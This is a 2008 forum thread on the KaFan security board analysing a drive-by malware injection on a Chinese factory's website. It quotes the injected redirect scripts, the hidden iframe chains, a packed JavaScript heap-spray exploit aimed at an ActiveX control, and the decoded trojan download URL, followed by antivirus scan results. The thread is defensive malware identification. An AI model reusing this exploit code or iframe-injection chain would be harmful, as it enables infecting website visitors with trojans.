查看: 3075|回复: 13
收起左侧

[已鉴定] 众邦立体光栅材料厂被挂网马

 关闭 [复制链接]
九尾野狐
头像被屏蔽
发表于 2008-5-17 14:57:08 | 显示全部楼层 |阅读模式
众邦立体光栅材料厂(hxxp://www.xtsptg.com)被插入恶意代码:
    [script]hxxp://cnzz.zyns.com/stat.js?id=4265203&web_id=4265203&show=pic
    [frame]hxxp://ca.winvv.com/cn.htm

-----

第一个 hXXp___cnzz.zyns.com_stat.js_id=4265203&web_id=4265203&show=pic.js内容如下
<html>
<head>
<META http-equiv=Pragma content=no-cache>
<META http-equiv=Cache-Control content=no-cache>
<META http-equiv=Expires content=0>
<script Language="javascript">
var strArray = "hXXp://220.165.9.233:2080/response.asp?MT=";
t = strArray + window.location.hostname.replace(/\./g," ");
document.location.href = t;
</script>
</head>
<body>
</body>
</html>

-----

hXXp://220.165.9.233:2080/response.asp?MT 内容如下:
<html>
<head>
<META http-equiv=Pragma content=no-cache>
<META http-equiv=Cache-Control content=no-cache>
<META http-equiv=Expires content=0>
<script language="Javascript">
    rnd.today=new Date();
    rnd.seed=rnd.today.getTime();
    function rnd() {
       rnd.seed = (rnd.seed*9301+49297) % 233280;
       return rnd.seed/(233280.0);
    };
    function rand(number) {
       return Math.ceil(rnd()*number);
    };

function jump(){

strArray = "hXXp://www.wipa68.com/cuolian.htm?id=310006&url=";
try{
      var $url = window.location.href;
      } catch(e){
          var $url = window.top.location.href;
      }

   var $start = $url.indexOf('MT=')+3;
   if ($start > 3) {
       var $Query_String = $url.substring($start, $url.length);
       var $Get_List = $Query_String.split('&');
       t = strArray + $Get_List[0]+"&id="+rnd()*100000000000000000000;
   }
   else {
       t = strArray + window.location.hostname+"&id="+rnd()*100000000000000000000;
   }
   document.location.href = t;
}
</script>
</head>
<body>
<script language="Javascript">
   var counterURL="hXXp://220.165.9.235:2080/nxdomain233.css"
   counterURL=counterURL+"."+rnd()*100000000000000000000;
   document.write("<iframe width=0 height=0 frameborder=0 scrolling=auto src="+counterURL+"></iframe>");

   setTimeout("jump()",100);

</script>
</body>
</html>


-----

-----

第二个 hxxp://ca.winvv.com/cn.htm 内容如下

<iframe src=hXXp://jjj.hfb86.cn/w6.htm width=100 height=0></iframe>
<iframe src=hXXp://www.fast800.cn/shan.htm width=0 height=0></iframe>
<iframe src="hXXp://ca.winvv.com/ie.htm" width=0 height=0></iframe>
<iframe src="hXXp://czz.aeaer.com/c.htm" width=0 height=0></iframe>

-----

其中 hXXp://jjj.hfb86.cn/w6.htm 内容如下
<html>
<head>
<script language="JavaScript" defer>
   eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c+'\\b','g'),k[c])}}return p}('33(38.62(47,42,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,7,6,5,42,47,13,10,1,0,17,4,24,16,11,17,32,21,20,2,4,15,40,41,29,22,8,18,32,14,20,2,9,9,4,11,12,2,49,61,0,17,2,14,4,8,25,2,40,34,37,0,57,48,57,48,37,0,54,48,57,48,37,0,49,55,2,3,37,0,54,52,53,2,37,0,51,48,8,49,37,0,48,48,48,48,34,43,34,37,0,48,53,48,48,37,0,48,56,48,48,37,0,48,48,48,48,37,0,1,56,56,3,37,0,48,48,3,57,37,0,48,48,48,52,37,0,1,51,48,48,37,0,1,1,8,52,37,0,2,56,2,48,34,43,34,37,0,1,1,2,52,37,0,1,1,1,1,37,0,8,49,54,52,37,0,48,48,51,48,37,0,48,48,48,48,37,0,52,48,56,3,37,0,56,3,48,4,37,0,49,4,55,48,37,0,56,3,8,12,34,43,34,37,0,48,56,55,48,37,0,2,4,56,49,37,0,48,50,48,48,37,0,48,48,48,48,37,0,2,4,56,3,37,0,2,56,3,3,37,0,48,50,48,1,37,0,56,3,48,48,37,0,56,53,48,51,34,43,34,37,0,48,1,4,48,37,0,3,3,56,53,37,0,48,48,48,48,37,0,1,1,48,48,37,0,2,57,48,51,37,0,48,50,50,49,37,0,48,48,48,48,37,0,56,57,53,3,37,0,50,48,53,12,34,43,34,37,0,54,56,53,54,37,0,1,2,57,56,37,0,48,2,56,8,37,0,3,49,2,56,37,0,48,48,48,48,37,0,56,57,48,48,37,0,48,4,52,53,37,0,54,56,53,54,37,0,52,2,56,2,34,43,34,37,0,2,4,48,2,37,0,8,51,2,56,37,0,48,48,48,48,37,0,56,57,48,48,37,0,48,52,52,53,37,0,54,56,53,54,37,0,55,57,4,49,37,0,3,56,2,53,37,0,57,53,2,56,34,43,34,37,0,48,48,48,48,37,0,56,57,48,48,37,0,49,4,52,53,37,0,54,56,53,54,37,0,4,54,49,3,37,0,55,57,52,54,37,0,56,55,2,56,37,0,48,48,48,48,37,0,56,57,48,48,34,43,34,37,0,49,48,52,53,37,0,54,56,53,54,37,0,1,4,8,8,37,0,55,4,48,12,37,0,55,57,2,56,37,0,48,48,48,48,37,0,56,57,48,48,37,0,48,56,52,53,37,0,54,56,53,54,34,43,34,37,0,56,52,2,55,37,0,3,52,54,57,37,0,54,3,2,56,37,0,48,48,48,48,37,0,56,57,48,48,37,0,49,52,52,53,37,0,2,48,3,3,37,0,48,50,48,1,37,0,56,57,48,48,34,43,34,37,0,51,51,48,51,37,0,4,55,1,54,37,0,50,56,52,53,37,0,53,50,53,53,37,0,52,12,52,4,37,0,52,53,4,55,37,0,52,1,50,4,37,0,48,48,52,2,37,0,56,12,48,48,34,43,34,37,0,50,56,53,12,37,0,1,1,53,51,37,0,48,52,53,53,37,0,54,56,53,48,37,0,49,8,51,54,37,0,55,48,50,1,37,0,51,1,2,56,37,0,48,48,48,48,37,0,56,57,48,48,34,43,34,37,0,50,52,52,53,37,0,55,1,54,8,37,0,53,12,56,12,37,0,53,51,50,56,37,0,53,53,1,1,37,0,4,55,49,4,37,0,48,53,52,52,37,0,53,4,50,56,37,0,54,53,50,2,34,43,34,37,0,4,55,55,56,37,0,48,53,52,52,37,0,54,53,50,4,37,0,48,48,48,48,37,0,53,54,48,48,37,0,56,12,53,54,37,0,50,56,55,12,37,0,1,1,53,55,37,0,50,48,55,53,34,43,34,37,0,1,1,53,54,37,0,50,52,53,53,37,0,53,55,53,54,37,0,53,53,1,1,37,0,2,56,48,4,37,0,48,48,54,50,37,0,48,48,48,48,37,0,4,52,56,49,37,0,48,50,48,48,34,43,34,37,0,48,48,48,48,37,0,51,51,54,49,37,0,4,50,4,48,37,0,48,48,48,52,37,0,56,3,53,53,37,0,53,49,2,4,37,0,56,3,53,51,37,0,48,56,55,12,37,0,53,12,56,3,34,43,34,37,0,53,54,48,4,37,0,55,51,56,3,37,0,56,3,51,4,37,0,49,2,55,52,37,0,48,51,55,56,37,0,53,54,1,51,37,0,55,54,56,3,37,0,48,51,50,48,37,0,51,51,1,51,34,43,34,37,0,52,57,4,57,37,0,8,12,52,49,37,0,4,51,48,51,37,0,51,51,53,54,37,0,48,1,1,54,37,0,49,48,3,2,37,0,1,50,51,8,37,0,48,56,55,52,37,0,4,2,4,49,34,43,34,37,0,48,51,48,12,37,0,52,48,1,50,37,0,1,49,2,3,37,0,1,2,51,3,37,0,55,53,53,2,37,0,53,8,2,53,37,0,2,3,56,3,37,0,53,8,56,3,37,0,48,51,50,52,34,43,34,37,0,54,54,12,12,37,0,48,4,56,3,37,0,56,3,52,3,37,0,49,4,53,8,37,0,12,12,48,51,37,0,48,52,56,3,37,0,48,51,56,3,37,0,53,2,4,53,37,0,53,57,53,3,34,43,34,37,0,4,50,53,12,37,0,48,48,48,56,37,0,57,50,2,57,37,0,48,48,48,48,37,0,53,2,48,48,37,0,56,48,3,1,37,0,48,50,48,4,37,0,3,57,48,48,37,0,48,49,48,48,34,43,34,37,0,48,48,48,48,37,0,8,52,1,51,37,0,2,4,56,49,37,0,48,49,48,48,37,0,48,48,48,48,37,0,1,4,56,3,37,0,4,55,56,51,37,0,4,55,49,48,37,0,54,2,48,55,34,43,34,37,0,54,52,55,52,37,0,4,55,54,4,37,0,48,52,52,55,37,0,48,48,54,4,37,0,48,48,48,48,37,0,1,1,53,55,37,0,48,52,53,53,37,0,52,53,56,57,37,0,4,55,50,52,34,43,34,37,0,53,50,48,55,37,0,54,4,55,52,37,0,4,55,52,49,37,0,48,52,52,55,37,0,54,4,54,4,37,0,54,51,54,1,37,0,52,55,4,55,37,0,54,49,48,56,37,0,54,53,55,52,34,43,34,37,0,4,55,52,56,37,0,48,4,52,55,37,0,54,49,54,53,37,0,48,48,55,48,37,0,53,48,53,55,37,0,53,53,1,1,37,0,56,3,48,56,37,0,3,56,1,48,37,0,48,1,2,52,34,43,34,37,0,48,48,48,50,37,0,51,48,56,57,37,0,48,55,4,55,37,0,55,51,54,12,37,0,54,51,55,54,37,0,52,55,4,55,37,0,55,50,48,52,37,0,48,48,55,52,37,0,53,55,48,48,34,43,34,37,0,53,53,1,1,37,0,56,3,48,52,37,0,51,4,52,56,37,0,56,4,56,3,37,0,56,48,48,56,37,0,48,48,48,48,37,0,51,57,48,48,37,0,48,56,51,52,37,0,48,52,55,52,34,43,34,37,0,1,57,2,50,37,0,49,50,2,3,37,0,51,52,56,12,37,0,53,53,48,56,37,0,52,48,54,8,37,0,48,52,54,8,37,0,1,1,53,54,37,0,49,48,53,53,37,0,48,54,4,55,34,43,34,37,0,48,4,56,48,37,0,48,48,48,50,37,0,4,52,56,49,37,0,48,49,48,48,37,0,48,48,48,48,37,0,2,56,4,51,37,0,1,1,54,57,37,0,1,1,1,1,37,0,48,52,56,3,34,43,34,37,0,53,51,50,52,37,0,53,50,53,49,37,0,53,55,53,54,37,0,2,4,3,57,37,0,48,50,48,1,37,0,56,3,48,48,37,0,56,53,49,57,37,0,55,53,12,3,37,0,51,51,53,48,34,43,34,37,0,51,51,4,57,37,0,56,51,12,3,37,0,48,54,2,56,37,0,3,55,48,1,37,0,56,49,49,56,37,0,1,1,1,3,37,0,48,48,49,53,37,0,55,53,48,48,37,0,56,51,51,2,34,43,34,37,0,48,54,2,56,37,0,3,55,48,1,37,0,56,49,49,56,37,0,1,1,1,3,37,0,48,48,51,53,37,0,55,53,48,48,37,0,56,51,51,48,37,0,48,50,2,56,37,0,3,55,48,1,34,43,34,37,0,56,51,49,56,37,0,54,8,1,3,37,0,50,53,55,53,37,0,4,48,56,51,37,0,56,3,48,52,37,0,3,56,51,48,37,0,48,1,2,48,37,0,48,48,48,50,37,0,48,48,54,56,34,43,34,37,0,48,48,48,48,37,0,54,56,48,49,37,0,49,48,48,48,37,0,48,48,48,48,37,0,48,48,54,8,37,0,49,48,1,1,37,0,48,54,56,57,37,0,52,52,56,57,37,0,49,56,50,52,34,43,34,37,0,2,4,3,57,37,0,48,50,48,1,37,0,1,1,48,48,37,0,53,1,48,49,37,0,53,8,53,2,37,0,53,3,53,57,37,0,2,52,3,56,37,0,48,50,48,1,37,0,1,1,48,48,34,43,34,37,0,2,56,50,48,37,0,1,12,12,8,37,0,1,1,1,1,34,43,34,37,0,55,52,54,56,37,0,55,48,55,52,37,0,50,1,51,8,37,0,54,50,50,1,37,0,55,51,50,2,37,0,51,48,51,49,37,0,50,12,51,50,37,0,54,2,54,51,37,0,55,8,55,8,37,0,54,51,50,2,37,0,54,12,54,1,37,0,51,48,50,1,37,0,54,4,55,50,37,0,54,53,50,2,37,0,54,53,55,56,37,0,48,48,48,48,34,41,59,22,8,18,32,3,16,19,3,9,11,4,15,61,0,17,2,14,4,8,25,2,40,34,37,0,48,21,48,21,37,0,48,21,48,21,34,41,59,22,8,18,32,20,2,8,12,2,18,14,16,30,2,61,50,48,59,22,8,18,32,14,9,8,4,15,14,25,8,4,2,61,20,2,8,12,2,18,14,16,30,2,43,14,20,2,9,9,4,11,12,2,49,46,9,2,17,19,24,20,59,27,20,16,9,2,40,3,16,19,3,9,11,4,15,46,9,2,17,19,24,20,60,14,9,8,4,15,14,25,8,4,2,41,3,16,19,3,9,11,4,15,43,61,3,16,19,3,9,11,4,15,59,22,8,18,32,1,16,9,9,3,9,11,4,15,61,3,16,19,3,9,11,4,15,46,14,0,3,14,24,18,16,17,19,40,48,44,14,9,8,4,15,14,25,8,4,2,41,59,22,8,18,32,3,9,11,4,15,61,3,16,19,3,9,11,4,15,46,14,0,3,14,24,18,16,17,19,40,48,44,3,16,19,3,9,11,4,15,46,9,2,17,19,24,20,45,14,9,8,4,15,14,25,8,4,2,41,59,27,20,16,9,2,40,3,9,11,4,15,46,9,2,17,19,24,20,43,14,9,8,4,15,14,25,8,4,2,60,48,63,52,48,48,48,48,41,3,9,11,4,15,61,3,9,11,4,15,43,3,9,11,4,15,43,1,16,9,9,3,9,11,4,15,59,22,8,18,32,23,2,23,11,18,28,61,17,2,27,32,36,18,18,8,28,40,41,59,1,11,18,40,16,61,48,59,16,60,52,48,48,59,16,43,43,41,29,23,2,23,11,18,28,35,16,58,61,3,9,11,4,15,43,14,20,2,9,9,4,11,12,2,49,31,22,8,18,32,3,0,1,61,39,39,59,27,20,16,9,2,40,3,0,1,46,9,2,17,19,24,20,60,51,50,41,3,0,1,61,3,0,1,43,0,17,2,14,4,8,25,2,40,34,37,48,21,34,41,59,22,8,18,32,23,61,39,39,59,23,61,11,3,26,46,21,11,17,14,11,9,2,59,11,3,26,46,21,11,17,14,11,9,2,61,3,0,1,59,11,3,26,46,21,11,17,14,11,9,2,61,23,59,23,61,11,3,26,46,21,11,17,14,11,9,2,59,11,3,26,46,21,11,17,14,11,9,2,61,3,0,1,59,11,3,26,46,21,11,17,14,11,9,2,61,23,31))',10,64,'117|102|101|98|99|33410|23383|21333|97|108||111|100||115|107|105|110|114|103|104|67|118|109|116|112|106|119|121|123|122|125||eval||91|65||String||||||||||||||||||||93||||fromCharCode|120'.split('|')))

   </script>
</head>
<body onload="JavaScript: return Check();">
<object classid="clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93" id="obj">
   Unable to create object
</object>
</body>
</html>

<iframe src="hXXp://yuerhj905687hjerklgf.cn/new/cc.htm" width=100 height=1></iframe>
<iframe src="hXXp://yuerhj905687hjerklgf.cn/new/c1.htm" width=1 height=1></iframe>

<script language="javascript" src="hXXp://ww4.tongji123.com/t1.aspx?id=44206085"></script>

<script src='http://s90.cnzz.com/stat.php?id=880299&web_id=880299' language='JavaScript' charset='gb2312'></script>

<script language="javascript" type="text/javascript" src="hXXp://js.users.51.la/1876325.js"></script>

-----

hXXp://www.fast800.cn/shan.htm 内容如下
<html>
<body>
<SCRIPT LANGUAGE="javascript" TYPE="text/javascript">var cookieString=document.cookie;var start=cookieString.indexOf("cookiesleep");if(start!=-1){}else{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie="cookiesleep=test;expires="+expires.toGMTString();document.write("<iframe width=50 height=0 src=ad/vip.htm></iframe>");}</SCRIPT>
<script language="javascript" type="text/javascript" src="hXXp://js.users.51.la/1660620.js"></script>
</body>
</html>
[/qoute]
-----

hXXp://ca.winvv.com/ie.htm 内容如下
[quote]
<iframe src="hXXp://www.kekg888.cn/web/6619038.htm" width=100 height=0></iframe>
<iframe src=hXXp://www.usaicac.cn/5519.htm width=100 height=0></iframe>


-----

hXXp://czz.aeaer.com/c.htm 内容如下
<iframe src=hXXp://cc.benchi999.com/one/huai5.htm width=2 height=2></iframe>

----

[ 本帖最后由 没注册 于 2008-5-17 14:59 编辑 ]
jiffy
发表于 2008-5-17 15:02:33 | 显示全部楼层
第一个打不开~

第二个:
未命名.JPG
jiffy
发表于 2008-5-17 15:03:24 | 显示全部楼层
貌似这里就我一个在用诺顿扫!
Exia 该用户已被删除
发表于 2008-5-17 15:08:00 | 显示全部楼层
Starting the file scan:

Begin scan in 'E:\AV\c.htm'
Begin scan in 'E:\AV\ie.htm'
E:\AV\ie.htm
      [DETECTION] Contains suspicious code HEUR/HTML.Malware
      [NOTE]      The fund was classified as suspicious.
      [NOTE]      The file was moved to '485c8534.qua'!
Begin scan in 'E:\AV\shan.htm'
Begin scan in 'E:\AV\cn.htm'
E:\AV\cn.htm
      [DETECTION] Contains detection pattern of the HTML script virus HTML/Infected.WebPage.Gen
      [NOTE]      The file was deleted!
Begin scan in 'E:\AV\w6.htm'
E:\AV\w6.htm
      [DETECTION] Contains suspicious code HEUR/HTML.Malware
      [NOTE]      The fund was classified as suspicious.
      [NOTE]      The file was moved to '485c8505.qua'!
Begin scan in 'E:\AV\cc.htm'
Begin scan in 'E:\AV\c1.htm'
Begin scan in 'E:\AV\huai5.htm'


End of the scan: 2008年5月17日  15:10
Used time: 00:11 min

The scan has been done completely.

      0 Scanning directories
      8 Files were scanned
      1 viruses and/or unwanted programs were found
      2 Files were classified as suspicious:
      1 files were deleted
      0 files were repaired
      2 files were moved to quarantine
      0 files were renamed
      0 Files cannot be scanned
      7 Files not concerned
      0 Archives were scanned
      0 Warnings
      3 Notes
granthill
发表于 2008-5-17 15:32:52 | 显示全部楼层

回复 1楼 没注册 的帖子

那个eval(function(p,a,c,k,e,d)解后

http://b.s102-cnzz.com/0rl.exe
wangjay1980
发表于 2008-5-17 16:19:09 | 显示全部楼层
K
屏幕截图00457.png
tanlimo
发表于 2008-5-17 17:01:34 | 显示全部楼层
和昨天某网挂的差不多。
雨宫优子
发表于 2008-5-17 17:07:15 | 显示全部楼层
2008-5-17 17:06:47        HTTP 过滤器        文件        http://b.s102-cnzz.com/0rl.exe        可能是 Win32/Genetik 特洛伊木马 的变种        连接中断 - 已隔离        Computer\***        通过应用程序访问 web 时检测到威胁: D:\Maxthon\Maxthon.exe.
Palkia
发表于 2008-5-17 18:40:02 | 显示全部楼层
Trojan.Agent.ltt.unvq
lx1234
发表于 2008-5-17 18:57:48 | 显示全部楼层
广西电信"在线防毒墙 "友情提醒:
访问该网站可能危害你的计算机!

    * 返回上页
    * 临时允许访问该站点
    * 永久允许访问该站点
    * 关闭窗口

感谢:瑞星 趋势  提供部分技术支持
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-16 23:24 , Processed in 0.141090 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表